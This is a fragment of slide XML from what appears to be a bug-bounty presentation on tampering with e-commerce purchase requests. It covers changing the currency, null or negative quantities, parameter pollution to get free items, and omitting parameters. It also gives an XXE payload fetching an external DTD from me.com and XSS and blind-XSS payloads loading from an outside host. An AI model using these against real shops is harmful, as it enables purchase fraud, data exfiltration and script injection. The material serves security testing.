              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The Original </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Currency</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Is dollar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Try To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Change It To INR </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get The Item Cheaper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58" name="Google Shape;2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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buying-something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Quantity=1&amp;price=10&amp;currency=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INR</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;token=************&amp;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add=egy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260" name="Google Shape;260;p4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61" name="Google Shape;26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596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7" name="Google Shape;267;p4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69" name="Google Shape;269;p4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Negative Numbers</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Zero</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NaN</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OR </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A Lot Of 00000</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> In All Field Values Of Parameters e.g.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Quantity=0000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Quantity=null </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cause Logical Issues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70" name="Google Shape;2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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buying-something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Quantity=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>price=10&amp;currency=dollar&amp;token=************&amp;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add=egy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72" name="Google Shape;272;p4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73" name="Google Shape;27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596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9" name="Google Shape;279;p4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81" name="Google Shape;281;p4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Parameter Pollution Technique e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quantity=1&amp;Quantity=2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Quantity=[] With All Parameters </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Get Free Items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82" name="Google Shape;2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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buying-something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Quantity=1&amp;Quantity=2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;price=10&amp;currency=dollar&amp;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token=************&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>add=egy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84" name="Google Shape;284;p4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85" name="Google Shape;285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596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1" name="Google Shape;291;p4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93" name="Google Shape;293;p4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Omit Parameters e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Removing The Parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> And </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Its Value</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OR </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Removing Only The Value</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OR </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394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Replace It To Null</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Cause Logical Issues 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94" name="Google Shape;29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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buying-something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Quantity=1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;price=10&amp;currency=dollar&amp;token=************&amp;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add=egy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96" name="Google Shape;296;p4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97" name="Google Shape;29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596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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3214900" y="4254850"/>
            <a:ext cx="931500" cy="13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4" name="Google Shape;304;p4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06" name="Google Shape;306;p4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Change Content Type Header To Content–Type: application/xml With XXE Payloads e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!DOCTYPE test [&lt;!ENTITY xxe SYSTEM </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://me.com/xxe.dtd</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt;]&gt;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307" name="Google Shape;30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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buying-something</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Content-Type: application/xml;charset=UTF–8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&lt;?xml version="1.0" encoding="UTF-8" standalone="no"?&gt;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&lt;!DOCTYPE test [&lt;!ENTITY xxe SYSTEM "http://me.com/xxe.dtd"&gt;]&gt;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&lt;root&gt;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&lt;Quantity&gt;&amp;xxe;&lt;/Quantity&gt;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&lt;price&gt;10&lt;/price&gt;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&lt;add&gt;egy&lt;/add&gt;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&lt;token&gt;******&lt;/token&gt;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&lt;/root&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="Google Shape;309;p4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10" name="Google Shape;31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6" name="Google Shape;316;p4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18" name="Google Shape;318;p4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 XSS Payloads e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;svg/onload=prompt(1)&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> OR Blind XSS Payloads e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;img src=//me.xss.ht&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> In All Field Values Of Parameters To Get XSS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19" name="Google Shape;31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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buying-something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Quantity=1&amp;price=10&amp;currency=dollar&amp;token=************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&amp;add=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;img src=//me.xss.ht&gt;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21" name="Google Shape;321;p4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22" name="Google Shape;32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8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24" name="Google Shape;324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